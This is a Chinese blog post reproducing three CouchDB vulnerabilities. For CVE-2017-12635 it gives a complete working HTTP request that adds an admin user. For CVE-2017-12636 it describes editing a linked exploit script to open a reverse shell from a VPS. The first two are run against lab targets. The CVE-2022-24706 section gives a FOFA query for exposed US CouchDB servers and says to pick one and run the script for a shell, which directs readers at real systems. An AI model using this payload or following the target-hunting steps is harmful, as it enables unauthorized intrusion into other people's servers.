couchdb漏洞复现
Couchdb 垂直权限绕过(CVE-2017-12635)
参考了其他文章的漏洞分析
简单来说就是javascript和内置的jiffy方法对json的解析方式不一样造成了任意用户任意添加管理员的漏洞。
漏洞复现:
搭建vulfocus启动靶场
使用poc进行发包添加管理员
PUT /_users/org.couchdb.user:jack HTTP/1.1
Host: ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "jack",
"roles": ["_admin"],
"roles": [],
"password": "jack"
}
返回页面进行登录尝试
可以成功登录
Couchdb 命令执行 (CVE-2017-12636)
利用脚本进行执行获取shell
脚本地址
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
漏洞复现:
使用vulfocus打开靶场
然后修改脚本反弹shell地址和目标地址,之后上传vps执行反弹
CouchDB Erlang 分布式协议代码执行(CVE-2022-24706)
fofa语法
""couchDB" && port="4369" && country="US""
然后找到一个目标,运行脚本就能获取shell
本文作者:Running_J
本文链接:https://www.cnblogs.com/ArcherCY/p/17712331.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步